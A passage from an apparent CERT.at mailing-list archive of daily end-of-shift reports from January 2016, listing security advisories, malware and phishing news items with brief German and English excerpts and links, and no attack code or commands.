Virtualization Server, and RIT Agent in Rational Performance Test Server (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974922 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM i (CVE-2015-7575). *** http://www.ibm.com/support/docview.wss?uid=nas8N1021096 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM MQ Appliance (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974598 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Security SiteProtector System (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974980 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of Content Manager OnDemand for Multiplatforms (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974698 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Sterling Connect:Direct for UNIX (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974884 --------------------------------------------- *** IBM Security Bulletin: IBM Platform Application Center Standard Edition is affected by a security vulnerability (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023269 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in the GSKit component of Transformation Extender (CVE-2016-0201, CVE-2015-7421, CVE-2015-7420) *** http://www.ibm.com/support/docview.wss?uid=swg21972246 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium *** http://www.ibm.com/support/docview.wss?uid=swg21973723 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 26-01-2016
by Daily end-of-shift report 26 Jan '16

26 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 25-01-2016 18:00 − Dienstag 26-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco Unified Contact Center Express Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the HTTP web-based management interface of the Cisco Unified Contact Center Express could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface of the affected system. This vulnerability applies to all Permanent Web Links .. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Application Policy Infrastructure Controller Enterprise Module SNMP Hostname Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the Simple Network Management Protocol (SNMP) query process of the Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) could allow an unauthenticated, remote attacker to perform a cross-site scripting (XSS) attack. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** DSA-3453 mariadb-10.0 - security update *** --------------------------------------------- https://www.debian.org/security/2016/dsa-3453 *** Symantec partner caught running tech support scam *** --------------------------------------------- Tech support scammers are known for their cheek -- making unfounded claims that PCs are infected to scare consumers into parting with their money -- but a Symantec partner took nerve to a new level, a security company claimed last week.According to San Jose, Calif.-based Malwarebytes, Silurian .. --------------------------------------------- http://www.cio.com/article/3026356/security/symantec-partner-caught-running… *** Pentest Time Machine: NMAP + Powershell + whatever tool is next *** --------------------------------------------- Early on in many penetration test or security assessment, you will often find yourself wading through what seems like hundreds or thousands of text files, each seemingly hundreds or thousands of pages long (likely because they are). One .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20653& *** Appointment Booking Calendar <= 1.1.23 - Unauthenticated SQL Injection *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8366 *** PDF-Reader Foxit Reader für Schadcode anfällig *** --------------------------------------------- Neue Versionen sichern Foxit PhantomPDF und Foxit Reader ab. Beide Anwendungen lassen sich aus der Ferne attackieren und Angreifer können eigenen Code auf Computer schleusen. --------------------------------------------- http://heise.de/-3084161 *** Carsharing-Anbieter: Phishing-Angriff auf Car2go-Nutzer *** --------------------------------------------- Wer von einem Onlinedienst zur 'Verifizierung' von Daten aufgerufen wird, sollte immer vorsichtig sein. Aktuell läuft eine Phishing-Kampagne gegen Nutzer des Carsharing-Angebots von Daimler. --------------------------------------------- http://www.golem.de/news/carsharing-anbieter-phishing-angriff-auf-car2go-nu… *** Sicherheitsupdate für OpenSSL steht an *** --------------------------------------------- Neue OpenSSL-Versionen sollen zwei Sicherheitslücken schließen. Den Schweregrad einer Schwachstelle stuft das OpenSSL-Team mit hoch ein. --------------------------------------------- http://heise.de/-3084227 *** WP Easy Gallery <= 4.1.4 - Reflected Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8367 *** Curve25519/Curve447: Neue elliptische Kurven von der IETF *** --------------------------------------------- Die Krypto-Arbeitsgruppe der IETF hat RFC 7748 veröffentlicht. Darin spezifiziert sind die zwei elliptischen Kurven Curve25519 und Curve447. Die Einigung ist das Ergebnis einer langen Diskussion. --------------------------------------------- http://www.golem.de/news/curve25519-curve447-neue-elliptische-kurven-von-de… *** Battling Business Email Compromise Fraud: How Do You Start? *** --------------------------------------------- In May 2014, an accountant to a Texas manufacturing firm received an email from a familiar correspondent, his company's CEO. The email instructed him to wait for a call from a partner company and warned against sharing the email to anyone .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/battling-busines… *** Oracle Pushes Java Fix: Patch It or Pitch It *** --------------------------------------------- Oracle has shipped an update for its Java software that fixes at least eight critical security holes. If you have an affirmative use for Java, please update to the latest version; if youre not sure why you have Java installed, its high time to remove the program once and for all. --------------------------------------------- http://krebsonsecurity.com/2016/01/oracle-pushes-java-fix-patch-it-or-pitch… *** Symantec detects 3,500 servers infected with a malicious script *** --------------------------------------------- Symantec reported the worldwide infection of 3,500 public servers with a malicious script that redirects its victims to other compromised websites and said it believes could be part of a recon effort for future attacks. --------------------------------------------- http://www.scmagazine.com/symantec-detects-3500-servers-infected-with-a-mal… *** Nach dem Hack: Vtech geht wieder ein bisschen online *** --------------------------------------------- Der Spielzeughersteller Vtech wurde Ende vergangenen Jahres wegen großer Sicherheitsmängel kritisiert und nahm daraufhin viele seiner Dienste vom Netz. Jetzt gehen einige Produkte wieder online - bei der Security will das Unternehmen dazugelernt haben. --------------------------------------------- http://www.golem.de/news/nach-dem-hack-vtech-geht-wieder-ein-bisschen-onlin…

1 0

Tageszusammenfassung - Montag 25-01-2016
by Daily end-of-shift report 25 Jan '16

25 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 22-01-2016 18:00 − Montag 25-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** ZDI-16-023: Oracle GoldenGate Veridata File Upload Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle GoldenGate. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-023/ *** Hospira Multiple Products Buffer Overflow Vulnerability *** --------------------------------------------- Jeremy Richards of SAINT Corporation has identified a buffer overflow vulnerability in Hospira's LifeCare PCA Infusion System. Hospira has determined that LifeCare PCA Infusion Systems released prior to July 2009 that are running Communication Engine (CE) Version 1.0 or earlier are vulnerable. In response to Jeremy .. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-337-02 *** Security Advisory: Stored XSS in Magento *** --------------------------------------------- During our regular research audits for our Cloud-based WAF, we discovered a Stored XSS vulnerability affecting the Magento platform that can be easily exploited remotely. We notified the Magento team and worked with them to get it fixed. --------------------------------------------- https://blog.sucuri.net/2016/01/security-advisory-stored-xss-in-magento.html *** 'Deliberate' Backdoor Removed From Secure Conferencing Gear *** --------------------------------------------- AMX, a provider of audio-visual conferencing gear used in sensitive government and military locations, has removed a 'deliberate' backdoor in one of its central controller system products. --------------------------------------------- http://threatpost.com/deliberate-backdoor-removed-from-secure-conferencing-… *** Rsync Symlink Path Validation Flaw Lets Remote Users Write Files on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034786 *** JavaScript Backdoor *** --------------------------------------------- Casey Smith recently shared his research on twitter, which is to reverse HTTP Shell by using JavaScript. I found it rather interesting and further analyzed this technique. --------------------------------------------- http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html *** Snowden enttarnt falsche "Krypto-Mail" in IS-Video *** --------------------------------------------- Terrororganisation hatte in Botschaft mit weiteren Angriffen gedroht --------------------------------------------- http://derstandard.at/2000029688150 *** Fortinet: Mehr Hintertüren, mehr Patches *** --------------------------------------------- Erst in der vergangenen Woche war bekanntgeworden, dass einige Fortinet-Firewall-Produkte einen Zugang mit Standardpasswörtern ermöglichen. Jetzt hat das Unternehmen seine eigenen Produkte analysiert - und weitere verwundbare Geräte gefunden. --------------------------------------------- http://www.golem.de/news/fortinet-mehr-hintertueren-mehr-patches-1601-11872… *** CVE-2015-8651 (Flash up to 20.0.0.228/235) and Exploit Kits *** --------------------------------------------- http://malware.dontneedcoffee.com/2016/01/cve-2015-8651.html *** Multi-Faktor-Authentifizierung: Neue vPro-Generation bringt Intel Authenticate *** --------------------------------------------- Mit der sechsten Generation des Core i (Skylake) und dem Start der entsprechenden Geschäftskundenplattform will Intel nun verstärkt auch Sicherheitslösungen in vPro anbieten. Eine betriebssystemunabhängige Firmware und direktes Ansprechen der Grafikkarte sollen Keylogger chancenlos lassen. --------------------------------------------- http://www.golem.de/news/multi-faktor-authentifizierung-neue-vpro-generatio… *** RSA Conference disables Twitter password-collecting form *** --------------------------------------------- After a storm of criticism and shaming over the blurb-tweeting feature, the organizers said that they had used OAuth and hadnt collected passwords. --------------------------------------------- https://nakedsecurity.sophos.com/2016/01/25/rsa-conference-disables-twitter… *** Linux kernel : Denial of service with specially crafted key file. *** --------------------------------------------- An issue with ASN1.1 DER decoder was reported that a specially created key can lead to a kernel panic via x509 certificate DER signature parsing. --------------------------------------------- http://www.openwall.com/lists/oss-security/2016/01/25/2 *** Sicherheitspatches: Angreifer können Webseiten mit Magento-Shop kapern *** --------------------------------------------- Magento sichert sein Shop-System ab. Dabei schließt der Anbieter zwei als kritisch eingestufte Lücken, über die Angreifer Admin-Sessions übernehmen können. --------------------------------------------- http://heise.de/-3083645 *** Hard-Coded Password Found in Lenovo File-Sharing App *** --------------------------------------------- Lenovos SHAREit file-sharing app for Windows and Android has been patched against vulnerabilities that put private data at risk. --------------------------------------------- http://threatpost.com/hard-coded-password-found-in-lenovo-file-sharing-app/… *** Hack Brief: Don't Be Trolled by This iPhone-Crashing Link Meme *** --------------------------------------------- Pranksters are passing a link to "crashsafari.com" around social media, which immediately crashes iPhones and iPads. --------------------------------------------- http://www.wired.com/2016/01/hack-brief-dont-be-trolled-by-this-iphone-cras…

1 0

Tageszusammenfassung - Freitag 22-01-2016
by Daily end-of-shift report 22 Jan '16

22 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 21-01-2016 18:00 − Freitag 22-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Scanning for Fortinet ssh backdoor, (Thu, Jan 21st) *** --------------------------------------------- On 11 Jan, a Python script was posted on the full-disclosure mailing list that took advantage of a hardcoded ssh password in some older versions of various products from Fortinet (see complete list in Ref [1] below). Looking at our collected ssh data, weve seen an increase in scanning for those devices in the days since the revelation of the vulnerability. Nearly all of this scanning has come from two IPs in China (124.160.116.194 and 183.131.19.18). So if you... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20635&rss *** Unknown attackers are infecting home routers via dating sites *** --------------------------------------------- Damballa researchers have spotted an active campaign aimed at infecting as many home routers possible with a worm. A variant of the TheMoon worm, it works by taking advantage of a weakness in the H... --------------------------------------------- http://www.net-security.org/malware_news.php?id=3192 *** Security: Auch Kreditkarten mit Chip und PIN können kopiert werden *** --------------------------------------------- Bislang war bekannt, dass Kreditkarten mit Magnetstreifen mit trivialen Mitteln kopierbar sind. Aktuelle Recherchen zeigen, dass auch Karten mit dem besser gesicherten Chip-und-PIN-Verfahren kopiert werden können - weil einige Banken schlampen. --------------------------------------------- http://www.golem.de/news/security-auch-kreditkarten-mit-chip-und-pin-koenne… *** Fraunhofer ESK: Skype ist Sicherheitsrisiko für Firmen *** --------------------------------------------- Wissenschaftler des Fraunhofer-ESK-Instituts haben Microsofts Instant-Messaging-Dienst Skype untersucht und raten Firmen vom Einsatz ab. Vor allem wegen der Netzarchitektur und der Verschlüsselung haben sie Sicherheitsbedenken. --------------------------------------------- http://www.heise.de/newsticker/meldung/Fraunhofer-ESK-Skype-ist-Sicherheits… *** Extracting pcap from memory , (Fri, Jan 22nd) *** --------------------------------------------- I have talked many times about memory forensics and how useful its. In this diary I am going to talk about how to extract a pcap file from a memory image using bulk_extractor. Of course when we are extracting a pcap file from a memory image we are going to not have everything but there will be some remanence that can help in our investigation bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20639&rss *** Trojan.DNSChanger circumvents Powershell restrictions *** --------------------------------------------- We take a close look at the functionality of a new variant of the DNS-changer adware family. Especially the use of encoded scripts as a way to bypass the Powershell execution protection.Categories: Security ThreatTags: adwarechangerdnsPieter Arntzpowershellrestrictedrestrictionstrojan(Read more...) --------------------------------------------- https://blog.malwarebytes.org/security-threat/2016/01/trojan-dnschanger-cir… *** Citrix XenServer Security Update for CVE-2016-1571 *** --------------------------------------------- A security vulnerability has been identified in Citrix XenServer that could, if exploited, allow a malicious administrator of a guest VM to crash the host in certain deployments. This vulnerability affects all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.5 Service Pack 1. --------------------------------------------- https://support.citrix.com/article/CTX205496 *** Multiple Buffalo network devices vulnerable to cross-site scripting *** --------------------------------------------- Multiple network devices provided by BUFFALO INC. contain a cross-site scripting vulnerability. --------------------------------------------- http://jvn.jp/en/jp/JVN49225722/ *** Multiple Buffalo network devices vulnerable to cross-site request forgery *** --------------------------------------------- Multiple network devices provided by BUFFALO INC. contain a cross-site request forgery vulnerability. --------------------------------------------- http://jvn.jp/en/jp/JVN09268287/ *** DSA-3451 fuse - security update *** --------------------------------------------- Jann Horn discovered a vulnerability in the fuse (Filesystem inUserspace) package in Debian. The fuse package ships an udev ruleadjusting permissions on the related /dev/cuse character device, makingit world writable. --------------------------------------------- https://www.debian.org/security/2016/dsa-3451 *** DFN-CERT-2016-0129: NTP: Eine Schwachstelle ermöglicht das Erlangen von Administratorrechten *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0129/ *** DFN-CERT-2016-0125: Red Hat JBoss Web Server: Mehrere Schwachstellen ermöglichen Denial-of-Service-Angriffe und das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0125/ *** USN-2879-1: rsync vulnerability *** --------------------------------------------- Ubuntu Security Notice USN-2879-121st January, 2016rsync vulnerabilityA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10 Ubuntu 15.04 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryrsync could be made to write files outside of the expected directory.Software description rsync - fast, versatile, remote (and local) file-copying tool DetailsIt was discovered that rsync incorrectly handled invalid filenames. Amalicious server could use this issue to write files outside of... --------------------------------------------- http://www.ubuntu.com/usn/usn-2879-1/ *** CAREL PlantVisor Enhanced Authentication Bypass Vulnerability *** --------------------------------------------- This advisory contains mitigation details for an authorization bypass vulnerability in CAREL's PlantVisor application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-021-01 *** Security Advisory: NTP vulnerabilities CVE-2015-5194 and CVE-2015-5195 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/02/sol02360853.html?… *** Bugtraq: January 2016 - Bamboo - Critical Security Advisory *** --------------------------------------------- http://www.securityfocus.com/archive/1/537347

1 0

Tageszusammenfassung - Donnerstag 21-01-2016
by Daily end-of-shift report 21 Jan '16

21 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 20-01-2016 18:00 − Donnerstag 21-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Asacub Android Trojan: Financial fraud and information stealing *** --------------------------------------------- Asacub is a new malware that targets Android users for financial gain. When first identified, Asacub displayed all the signs of an information stealing malware; however, some versions of the Trojan ar... --------------------------------------------- http://www.net-security.org/malware_news.php?id=3190 *** TeslaCrypt Decrypted: Flaw in TeslaCrypt allows Victims to Recover their Files *** --------------------------------------------- For a little over a month, researchers and previous victims have been quietly helping TeslaCrypt victims get their files back using a flaw in the TeslaCrypts encryption key storage algorithm. The information that the ransomware could be decrypted was being kept quiet so that that the malware developer would not learn about it and fix the flaw. Since the recently released TeslaCrypt 3.0 has fixed this flaw, we have decided to publish the information on how a victim could... --------------------------------------------- http://www.bleepingcomputer.com/news/security/teslacrypt-decrypted-flaw-in-… *** El Chapos Opsec *** --------------------------------------------- Ive already written about Sean Penns opsec while communicating with El Chapo. Heres the technique of mirroring, explained: El chapo then switched to a complex system of using BBM (Blackberrys Instant Messaging) and Proxies. The way it worked was if you needed to contact The Boss, you would send a BBM text to an intermediary (who would spend his days... --------------------------------------------- https://www.schneier.com/blog/archives/2016/01/el_chapos_opsec.html *** Cyber fraudsters steal over $50 million from airplane systems manufacturer *** --------------------------------------------- Austrian company FACC, which develops and produces components and systems made of composite materials for aircraft and aircraft engine manufacturers such as Boeing and Airbus, has been hit by hackers who managed to steal approximately 50 million euros (around $54,5 million). --------------------------------------------- http://www.net-security.org/secworld.php?id=19356 http://www.net-security.org/secworld.php?id=18808 (An emerging global threat: BEC scams hitting more and more businesses) *** Linux-Root-Exploit: Android-Bedrohung überschaubar *** --------------------------------------------- Ein Mitglied des Android-Sicherheitsteams geht davon aus, dass nur wenige Android-Versionen durch die lokale Rechtausweitungslücke im Linux-Kernel verwundbar sind. Ein Patch ist in Arbeit. --------------------------------------------- http://heise.de/-3080760 *** Captive-Portals: Das iPhone verrät Cookies *** --------------------------------------------- Die Nutzung von WLANs mit Captive-Portals kann für iPhone-Nutzer zur Sicherheitsgefahr werden. Einen entsprechenden Bug haben israelische Sicherheitsforscher gefunden. Apple hat die Sicherheitslücke mittlerweile behoben. --------------------------------------------- http://www.golem.de/news/captive-portals-das-iphone-verraet-cookies-1601-11… *** Deliberately hidden backdoor account in several AMX (HARMAN Professional) devices *** --------------------------------------------- Your conference room, a watchful protector."AMX (www.amx.com) is part of the HARMAN Professional Division, and the leading brand for the business, education, and government markets for the company. As such, AMX is dedicated to integrating AV solutions for an IT World. AMX solves the complexity of managing technology with reliable, consistent and scalable systems comprising control and automation, system-wide switching and AV signal distribution, digital signage and technology management. --------------------------------------------- http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in… *** "Ermittlungen" *** --------------------------------------------- "Ermittlungen" | 21. Jänner 2016 | Wir (mit Hut GovCERT) sind mal wieder vor Ort im Einsatz und helfen einer Organisation bei der Ursachenforschung und bei der Wiederherstellung der Services nach einem Sicherheitsvorfall. So weit so gut, dafür sind wir da, das ist unsere Aufgabe. Die Strafverfolgung ist aber definitiv nicht unsere Aufgabe. Das ist ganz klar und da behauptet auch keiner was anderes. Problematisch wird es dann, wenn Begriffe verwendet werden, die im normalen... --------------------------------------------- http://www.cert.at/services/blog/20160121173915-1656.html *** OpenVAS Greenbone Security Assistant Cross Site Scripting *** --------------------------------------------- Topic: OpenVAS Greenbone Security Assistant Cross Site Scripting Risk: Low Text:Vulnerability information Date: 13th January 2016 Product: Greenbone Security Assistant ≥ 6.0.0 and < 6.0.8 Vendor:... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010133 *** Security Advisory: BIG-IP file validation vulnerability CVE-2015-8021 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49580002.html?… *** Security Advisory: SNTP vulnerability CVE-2015-5219 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/60/sol60352002.html?… *** LiteSpeed Web Server Input Validation Flaw Lets Remote Users Inject HTTP Headers *** --------------------------------------------- http://www.securitytracker.com/id/1034746 *** DFN-CERT-2016-0118: Moodle: Zwei Schwachstellen ermöglichen u.a. einen Cross-Site-Scripting-Angriff *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0118/

1 0

Tageszusammenfassung - Mittwoch 20-01-2016
by Daily end-of-shift report 20 Jan '16

20 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 19-01-2016 18:00 − Mittwoch 20-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Survey shows many businesses aren't encrypting private employee data *** --------------------------------------------- Many companies arent encrypting their own employees private data, according to a Sophos survey of IT decision makers in six countries. --------------------------------------------- https://nakedsecurity.sophos.com/2016/01/19/survey-shows-many-businesses-ar… *** Android Malware Steals Voice-Based Two-Factor Authentication Codes (January 13 and 18, 2016) *** --------------------------------------------- Symantec has detected malware created for Android devices that steals single-use passcodes generated to add a layer of security to online banking authentication procedures... --------------------------------------------- http://www.sans.org/newsletters/newsbites/r/18/5/201 *** Dridex banking malware adds a new trick *** --------------------------------------------- Dridex, the banking malware that wont go away, has been improved upon once again.IBMs X-Force researchers have found that the latest version of Dridex uses a DNS (Domain Name System) trick to direct victims to fake banking websites.The technique, known as DNS cache poisoning, involves changing DNS settings to direct someone asking for a legitimate banking website to a fake site.DNS cache poisoning is a powerful attack. Even if a person types in the correct domain name for a bank, the fake... --------------------------------------------- http://www.cio.com/article/3024244/dridex-banking-malware-adds-a-new-trick.… *** /tmp, %TEMP%, ~/Desktop, T:\, ... A goldmine for pentesters!, (Wed, Jan 20th) *** --------------------------------------------- When you are performing a penetration test, you need to learn how your target is working: What kind of technologies and tools are used, how internal usernames are generated, email addresses format, ... Grabbing for such information is called the reconnaissance phase. Once you collected enough details, you can prepare your different scenarios to attack the target.All pentesters have their personal toolbox that has been enhanced day after day. In many cases, there is no real magic: to abuse or... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20631&rss *** Critical Patch Update: Oracle stellt 248 Sicherheitspatches bereit *** --------------------------------------------- Die bislang größte Sicherheitsptach-Sammlung von Oracle ist da und fixt Lücken in Database, Java, MySQL und Co. Dieses Mal steht Oracles E-Business Suite im Mittelpunkt. --------------------------------------------- http://heise.de/-3077692 *** Apple Releases Patches for iOS, OS X and Safari *** --------------------------------------------- Apple released security updates for iOS, OS X and Safari, patching a number of kernel-level code-execution vulnerabilities. --------------------------------------------- http://threatpost.com/apple-releases-patches-for-ios-os-x-and-safari/115946/ *** Trojan for Android preinstalled on Phillips s307 firmware *** --------------------------------------------- January 20, 2016 The past year was marked by a big number of firmware Trojans for Android capable to covertly download and install various software and display annoying advertisements. Android.Cooee.1 incorporated into the graphical shell of some cheap Chinese smartphones was one of them. Virus makers obviously continued to preinstall Android.Cooee.1 into mobile devices. This time, however, Doctor Web security researchers detected the Trojan on firmware of a well-known electronics manufacturer. --------------------------------------------- http://news.drweb.com/show/?i=9792&lng=en&c=9 *** Primes, parameters and moduli *** --------------------------------------------- First a brief history of Diffie-Hellman for those not familiar with it The short version of Diffie-Hellman is that two parties (Alice and Bob) want to share a secret so they can encrypt their communications and talk securely without an... --------------------------------------------- https://securityblog.redhat.com/2016/01/20/primes-parameters-and-moduli/ *** Serious flaw patched in Intel Driver Update Utility *** --------------------------------------------- A software utility that helps users download the latest drivers for their Intel hardware components contained a vulnerability that could have allowed man-in-the-middle attackers to execute malicious code on computers.The tool, known as the Intel Driver Update Utility, can be downloaded from Intels support website. It provides an easy way to find the latest drivers for various Intel chipsets, graphics cards, wireless cards, desktop boards, Intel NUC mini PCs or the Intel Compute Stick. --------------------------------------------- http://www.cio.com/article/3024345/serious-flaw-patched-in-intel-driver-upd… *** Cisco Guide to Harden Cisco IOS Devices *** --------------------------------------------- This document contains information to help you secure your Cisco IOS system devices, which increases the overall security of your network. Structured around the three planes into which functions of a network device can be categorized, this document provides an overview of each included feature and references to related documentation. --------------------------------------------- http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html *** Security Advisory: BIND vulnerability CVE-2015-8704 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/53/sol53445000.html?… *** Intel Driver Update Utility 2.2.0.5 Man-In-The-Middle *** --------------------------------------------- Topic: Intel Driver Update Utility 2.2.0.5 Man-In-The-Middle Risk: Medium Text:1. Advisory Information Title: Intel Driver Update Utility MiTM Advisory ID: CORE-2016-0001 Advisory URL: http://www.cores... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010119 *** Oracle Critical Patch Update Advisory - January 2016 *** --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html *** Oracle Linux Bulletin - January 2016 *** --------------------------------------------- http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867… *** HPSBGN03534 rev.1 - HPE Performance Center using Microsoft Report Viewer, Remote Disclosure of Information, Cross-Site Scripting (XSS) *** --------------------------------------------- A vulnerability in Microsoft Report Viewer was addressed by HPE Performance Center. This is a Cross-Site scripting (XSS) vulnerability that could allow remote information disclosure. --------------------------------------------- https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr… *** Xen Security Advisory CVE-2016-1571 / XSA-168 *** --------------------------------------------- VMX: intercept issue with INVLPG on non-canonical address --------------------------------------------- http://xenbits.xen.org/xsa/advisory-168.html *** Xen Security Advisory CVE-2016-1570 / XSA-167 *** --------------------------------------------- PV superpage functionality missing sanity checks --------------------------------------------- http://xenbits.xen.org/xsa/advisory-167.html *** Cisco Modular Encoding Platform D9036 Software Default Credentials Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** DFN-CERT-2016-0109: Foxit Reader, Foxit PhantomPDF: Mehrere Schwachstellen ermöglichen Denial-of-Service-Angriffe und das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0109/ *** DFN-CERT-2016-0106: NTP: Mehrere Schwachstellen ermöglichen u.a. das Darstellen falscher Informationen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0106/ *** APPLE-SA-2016-01-19-3 Safari 9.0.3 *** --------------------------------------------- APPLE-SA-2016-01-19-3 Safari 9.0.3Safari 9.0.3 is now available and addresses the following:WebKitAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,OS X El Capitan v10.11 to v10.11.2Impact: Visiting a maliciously crafted website may lead to arbitrarycode execution [...] --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00004.ht… *** APPLE-SA-2016-01-19-2 OS X El Capitan 10.11.3 and Security Update 2016-001 *** --------------------------------------------- APPLE-SA-2016-01-19-2 OS X El Capitan 10.11.3 and Security Update2016-001OS X El Capitan 10.11.3 and Security Update 2016-001 is now availableand addresses the following:AppleGraphicsPowerManagementAvailable for: OS X El Capitan v10.11 to v10.11. [...] --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00003.ht… *** APPLE-SA-2016-01-19-1 iOS 9.2.1 *** --------------------------------------------- APPLE-SA-2016-01-19-1 iOS 9.2.1iOS 9.2.1 is now available and addresses the following:Disk ImagesAvailable for: iPhone 4s and later,iPod touch (5th generation) and later, iPad 2 and laterImpact: A local user may be able to execute arbitrary code withkernel privileges [...] --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00002.ht… *** DSA-3449 bind9 - security update *** --------------------------------------------- It was discovered that specific APL RR data could trigger an INSISTfailure in apl_42.c and cause the BIND DNS server to exit, leading to adenial-of-service. --------------------------------------------- https://www.debian.org/security/2016/dsa-3449 *** Siemens OZW672 and OZW772 XSS Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a cross-site scripting vulnerability in Siemens OZW672 and OZW772 devices. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-019-01 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM FlashSystem model V840 (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005584 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM FlashSystem model 840 (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005585 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/docview.wss?uid=swg2C1000044 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM SAN Volume Controller and Storwize Family (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005583 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Sterling Connect:Express for UNIX (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974473 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Sterling Connect:Direct for UNIX (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974888 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM WebSphere MQ (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974466 --------------------------------------------- *** IBM Security Bulletin: IBM Spectrum Scale is affected by a security vulnerability (CVE-2015-7488) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005580 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2015-8027, CVE-2015-3194, 